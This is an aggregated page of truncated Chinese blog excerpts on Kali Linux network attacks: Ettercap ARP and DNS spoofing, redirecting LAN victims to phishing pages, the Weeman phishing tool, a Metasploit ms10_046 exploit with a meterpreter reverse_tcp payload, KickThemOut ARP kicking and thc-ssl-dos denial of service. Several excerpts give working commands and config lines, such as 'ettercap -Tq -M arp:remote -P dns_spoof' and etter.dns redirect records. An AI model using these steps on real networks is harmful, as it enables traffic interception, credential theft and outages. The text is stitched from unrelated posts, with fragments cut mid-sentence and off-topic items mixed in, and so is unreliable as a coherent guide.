转自:http://www.cnblogs.com/hkleak/p/5043063.html 笔记一:ettercap是什么? 我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道,但这两款工具是在windows下运行的. 而ettercap是在linux下运行的 .其实功能都是差不多的,我称呼它为嗅探工具,ARP欺骗,DNS,劫持,中间人攻击等等.总之这是一款强大的安全测试工具. 笔记二:DNS简单说明 了解DNS是什么:Domain Na…
基础知识 网关是啥? 网关是工作在OSI七层模型中的传输层或者应用层,用于高层协议的不同网络之间的连接,网关就好比一个房间通向另一个房间的一扇门. ARP协议 假设A(192.168.1.2)与B(192.168.1.3)在同一局域网,A要和B实现通信.A首先会发送一个数据包到广播地址(192.168.1.255),该数据包中包含了源IP(A).源MAC.目的IP(B).目的MAC,这个数据包会被发放给局域网中所有的主机,但是只有B主机会回复一个包含了源IP(B).源MAC.目的IP(A).目的…
系统:kali 2019  工具Ettercap,Metasploit 环境内网地址 首先 cd /etc/ettercap/ 移动在ettercap 文件下 在用vim 打开编辑 etter.dns 进去后 我们将局域网内 所有18段的ip 访问网页都欺骗跳转到本机ip 80端口 在里面添加 接着 编辑文件/var/www/html/index.html ,添加<html><img src="192.168.18.141/auto" ></html>…
1.网络攻击拓扑环境 网关:192.168.133.2 攻击者:192.168.133.128 受害者:192.168.133.137 2.原理讲解 ARP欺骗 简介:ARP(Address Resolution Protocol)是地址解析协议,是一种将IP地址转化成物理地址的协议.从IP地址到物理地址的映射有两种方式:表格方式和非表格方式.ARP具体说来就是将网络层(也就是相当于OSI的第三层)地址解析为数据链路层(也就是相当于OSI的第二层)的物理地址(注:此处物理地址并不一定指MAC地址…
一.Ettercap 使用教程 EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具.它具有动态连接嗅探.动态内容过滤和许多其他有趣的技巧.它支持对许多协议的主动和被动分析,并包含许多用于网络和主机分析的特性.主要适用于交换局域网络,借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输. 实验环境:Kali Linux2018.2 1. 由于我用的是kali linux 2018.2 版本,已经内置了…
ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /// /// Dns欺骗--Ettercap工具进行Dns欺骗 转载至 https://blog.csdn.net/bt517840374/article/details/79991382 首先,编辑/etc/ettercap/etter.dns,里面有Dns记录, *.ddh.edu.cn  A  10.10.10.10 这个是DNS记录,后面的ip是你想让Dns解析到的ip,能访问到的. 其次,…
下午无聊再网上闲逛随意看了下,自己做了一次测试,目前最新的版本是1.6.Weeman是一款运行在Python环境下的钓鱼渗透测试工具 但这款工具简单易用,安装简单,可伪造HTML页面等等...网上看了下,国内这个工具教程很少,要么教程都是重复的,而且也不是很详细. 所以自己摸索了几个小时,把大致的使用过程发布出来和大家分享一下.说的不好地方请大家见谅. 工具项目地址:https://github.com/Hypsurus/weeman/ 克隆地址:https://github.com/Hypsu…
转载:https://www.cnblogs.com/hkleak/p/5043063.html 笔记一:ettercap是什么? 我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道,但这两款工具是在windows下运行的. 而ettercap是在linux下运行的 .其实功能都是差不多的,我称呼它为嗅探工具,ARP欺骗,DNS,劫持,中间人攻击等等.总之这是一款强大的安全测试工具. 笔记二:DNS简单说明 了解DNS是什么:Domain N…
ettercap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于局域网. ettercap是一款现有流行的网络抓包软件,它利用计算机在局域网内进行通信的ARP协议的缺陷进行攻击,在目标与服务器之间充当中间人,嗅探两者之间的数据流量,从中窃取用户的数据资料.ettercap 在kali Linux 是自带的一个工具,它也有图形化的界面,不过熟练之后你会发现在终端以命令行的形式操作会更加方便.下面讲的就是ettercap的DNS欺诈和arp攻击.   下面开始Kali Linux 的操作了 (…
上次我们使用 arpspoof 工具在命令行中完成了 arp 欺骗实验,今天我们用另一种工具 ettercap 工具来实现.ettercap支持图形化操作,对新手非常友好,并且操作非常简单, ettercap 工具 ettercap是一款现有流行的网络抓包软件,他利用计算机在局域网内进行通信的ARP协议的缺陷进行攻击,在目标与服务器之间充当中间人,嗅探两者之间的数据流量,从中窃取用户的数据资料. 安装命令如下: apt-get install ettercap-graphical 实验要求: 两…
目的 让内网的所有计算机浏览网页的时候, 出现我的钓鱼页面 准备 kali系统 Bettercap dns文件 通过ifconfig查看当前计算机的ip, 我这边为, 192.168.1.150 创建一个 dns.conf 文件,下面这个dns语句的意思是:所有的.com结尾的网站全部解析到我的本地Http服务器, .*\.com就是一个正则,也可以是自定义的正则 192.168.1.150 .*\.com 本地搭建Http服务器 使用nodeJS搭建一个简单的服务器, 用apache或者其它工…
前言:不得不说Linux下的神器挺多,越来越喜欢Linux了.. . 測试环境            linux backtrack 5            windows xp 先在Linux下开启本地的apache服务. 等下使局域网中的电脑訪问的时候跳到我们这. apache的默认主页在/var/www/index.html 自己定义一个主页. watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvaWJleTBuZA==/font/5a6L5L2T/…
ms10_046_shortcut_icon_dllloader漏洞利用过程 msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms10_046_shortcut_icon_dllloader) >…
安装KickThemOut工具 $ git clone https://github.com/k4m4/kickthemout.git $ cd kickthemout/ $ sudo -H pip install -r requirements.txt 使用KickThemOut进行ARP欺骗 扫描网络.sudo python kickthemout.py 有时会因为某些原因未扫描成功,重新运行即可. 选择[1] KickONEOff,会列出局域网内的全部设备. 选择进行ARP欺骗的设备编号,…
一. thc-ssl-dos 1.简介 (1).SSL 协商加密对性能开销增加,大量握手请求会导致 DOS (2).利用 SSL secure Renegotiation 特性,在单一 TCP 连接中生成数千个 SSL 重连接请求,造成服务器资源过载 (3).与流量式拒绝访问攻击不同,thc-ssl-dos 可以利用 dsl 线路打垮 30G 带宽的服务器 (4).服务器平均可以处理 300 次/秒 SSL 握手请求 (5).对 SMTPS.POP3S 等服务同样有效 2.用法 root@kal…
Kali Linux Web 渗透测试视频教程—第十四课-arp欺骗.嗅探.dns欺骗.session劫持 文/玄魂 目录 Kali Linux Web 渗透测试—第十四课-arp欺骗.嗅探.dns欺骗.session劫持      1 关于嗅探.arp欺骗.会话劫持.............................................................. 1 视频教程地址:http://edu.51cto.com/course/course_id-1887.h…
这是一个DNS欺骗实验,使用kali的ettercap.有受害者.攻击者(虚拟机).Web服务器三台机器.受害者的事124.16.70.105虚拟机的是124.16.71.48web服务器是124.16.70.235,并且是80端口子网掩码是255255.254.0 小白已经欺骗成功,欺骗的目标域名是hao123. 但是他实验发现,使用受害者ping hao123的时候dns欺骗成功,显示IP已经是235,却用浏览器访问不了hao123,提示无法找到网页. 受害者访问baidu是可以正常访问的,…
无意间接触到这个叫中间人攻击,找了些教程自己搞了一遍. 局域网内测试,kali虚拟机桥接本地网络,不然不在一个段上面.kali 192.168.1.191 win10 :192.168.1.7 ettercap在kali中已经安装好的. 进入到页面后首先扫描一下局域网IP 首先选中网关192.168.1.1 Add to Target 1 其次在选中受攻击IP 192.168.1.7 Add to Target 2 我们要先去修改下DNS解析地址 vim /etc/ettercap/etter.…
很多的朋友都想把自己的电脑打造为服务器使别人能够访问.比如说你自己写了一网站,只能自己通过localhost访问或127.0.0.1访问.但是怎么让别人的电脑也能访问呢?来看看自己写的网站.现在我来讲讲怎么让局域网内的主机来访问你的主机. 首先我们要安装Apache,这个大家都知道吧!Apache是世界上公认的比较好的WEB服务器软件.我们先下载Apache然后安装起来.安装过程傻瓜式的,很轻松.然启动服务,然后在浏览器上输入127.0.0.1如果能进去看到一默认的网页就说明Apache已经安装…
在局域网内查询在线主机的IP一般比较简单,但局域网内全部电脑的IP怎么才能够查到呢?查询到IP后我还要知道对方的一些详细信息(如MAC地址.电脑名称等)该怎么查询呢??? 工具/原料 Windows 网络 方法一 查询本机IP——窗口查看 1 直接单击任务栏最右边的“本地连接”图标,会打开“本地连接状态”对话框,如图: 2 单击弹出对话框中的“支持”选项卡,在下面的“连接状态”中能够看到本机的基本IP信息,如上图: 3 再单击“本地连接状态”对话框中的“详细信息”按钮,将弹出“网络连接详细信息”…
在局域网内查询在线主机的IP一般比较简单,但局域网内全部电脑的IP怎么才能够查到呢?查询到IP后我还要知道对方的一些详细信息(如MAC地址.电脑名称等)该怎么查询呢??? 工具/原料 Windows 网络 方法一 查询本机IP——窗口查看 1 直接单击任务栏最右边的“本地连接”图标,会打开“本地连接状态”对话框,如图: 2 单击弹出对话框中的“支持”选项卡,在下面的“连接状态”中能够看到本机的基本IP信息,如上图: 3 再单击“本地连接状态”对话框中的“详细信息”按钮,将弹出“网络连接详细信息”…
众所周知,KMS激活方式是当前广大网民“试用”windows,office的最广泛的激活方式.几乎可以用于微软的全线产品. 但是在本机使用KMS类的激活工具总是有些不放心,一方面每隔180天都要重新激活,另外是这些工具来源不一,经常被杀软查杀,这些激活工具到底有没有安全问题?只能全靠信仰了. 因此,当前最能体现技术宅们不折腾不死心的做法就是在非本机环境下搭建kms激活模拟器,对局域网内机器进行远程激活. KMS激活服务器搭建 目前常用的KMS激活服务器程序为py-kms与vlmcsd,分别为py…
有两种方法可以让局域网内的电脑拥有固定的ip地址: 方法一:使用DHCP的静态地址分配功能(以TP-Link TL-WR847路由器为例). 打开浏览器,输入路由器LAN口的ip地址和管理员用户名.密码,进入路由器的设置页面. 单击左侧"DHCP服务器"按钮,再单击"静态地址分配"按钮. 单击"添加新条目",输入需要固定ip地址的电脑的网卡的MAC地址,以及需要使用的ip地址,再单击保存. 重启路由器后,设置了静态地址分配的电脑使用"自…
起因 某天中午午睡时,笔者被激烈的键盘和鼠标声音吵醒,发现实验室的同学在那边忘我地打LOL,顿觉不爽,于是决定整他一下.想了一下之后觉得就让他掉线一下作为惩罚好了.结合以往的理论知识,大家在同一个局域网中,用ARP欺骗显然是一个好办法,于是就有了本文接下来的故事. ARP欺骗理论 首先先来整理一下关于ARP欺骗的理论知识.ARP欺骗[1](英语:ARP spoofing),又称ARP病毒(ARP poisoning)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术.此种攻击可让攻击…
20145319 <网络渗透>DNS欺骗 实验内容 dns欺骗实质上就是一种通过修改dns文件来改变目标想访问的域名和对应ip的攻击,使得目标在访问自己常用域名时不知不觉落入我们的圈套(可以和之前的网站仿冒攻击一起,完成更加逼真的骗局) 首先是修改我们目标的DNS文件配置,打开/etc/ettercap/etter.dns在文件末尾加上我们企图修改的域名,以及对应Ip(这里以依旧网易邮箱为例,ip为自身Ip) 键入ifconfig eth0 promisc改kali网卡为混杂模式 在终端中键入…
https://www.v2ex.com/t/472394 这是一个创建于 126 天前的主题,其中的信息可能已经有所发展或是发生改变. 局域网内通过嵌入式设备搭建一个轻量级 web 服务,可以仍然使用 https 吗,有点困惑,证书什么的怎么办   局域网搭建轻量级嵌入式 37 回复  |  直到 2018-10-11 19:21:11 +08:00       1   paparika   126 天前   这里的局域网就特指普通家庭局域网       2   flowfire   126…
kali自带工具ettercap,使用前先开启IP转发功能 echo 1 > /proc/sys/net/ipv4/ip_forward 1.以管理员身份打开ettercap,两种方式-G图形化界面,-T文本模式 ettercap -G Ctrl+U #选择网卡,选择eth0 Ctrl+S #扫描局域网内存活主机 Ctrl+H #显示存活主机列表 将攻击目标添加到目标一,网关添加到目标二 开始攻击 最终在目标机上查看arp缓存表即可看到网关的mac地址被改成了攻击者的mac地址.…
MDNS协议介绍 mDNS multicast DNS , 使用5353端口,组播地址 224.0.0.251.在一个没有常规DNS服务器的小型网络内,可以使用mDNS来实现类似DNS的编程接口.包格式和操作语义.MDNS协议的报文与DNS的报文结构相同,但有些字段对于MDNS来说有新的含义. 每个进入局域网的主机,如果开启了mDNS服务的话,都会向局域网内的所有主机组播一个消息,我是谁,和我的IP地址是多少.然后其他也有该服务的主机就会响应,也会告诉你,它是谁,它的IP地址是多少.mDNS的域…
使用SubVersion+TortoiseSVN局域网内访问SVN成功后,想从外网访问SVN,使用花生壳绑定路由器动态DNS,但是折腾半天没搞定,突然发现一个帖子http://hi.baidu.com/shanzhai1088/item/541813dd2ceef703d78ed037 可以简单的实现. 1.visualSVN下载:http://www.visualsvn.com/server/ 安装后建立SVN库(Repository) 2.花生壳网站:http://www.oray.com/…
承接上一章,除了arp欺骗之外对的欺骗方法 a)使用kali,对dns文件进行编辑 使用的欺骗工具是ettercap.对dns文件编辑: 添加一个A记录,解释到kali自身: b)进行欺骗 通过命令行模式打开图形界面,选择Unified sniffing以中间人的方式进行嗅探 选择网卡,开那个段上就选择那个段上的网卡 选择dns_spoof c) 最后我们开始我们的dns欺骗,点击Start sniffing 然后我们的目标主机不管访问什么网站都会是我们刚开始设置的ip地址的网站 d) 结合CS…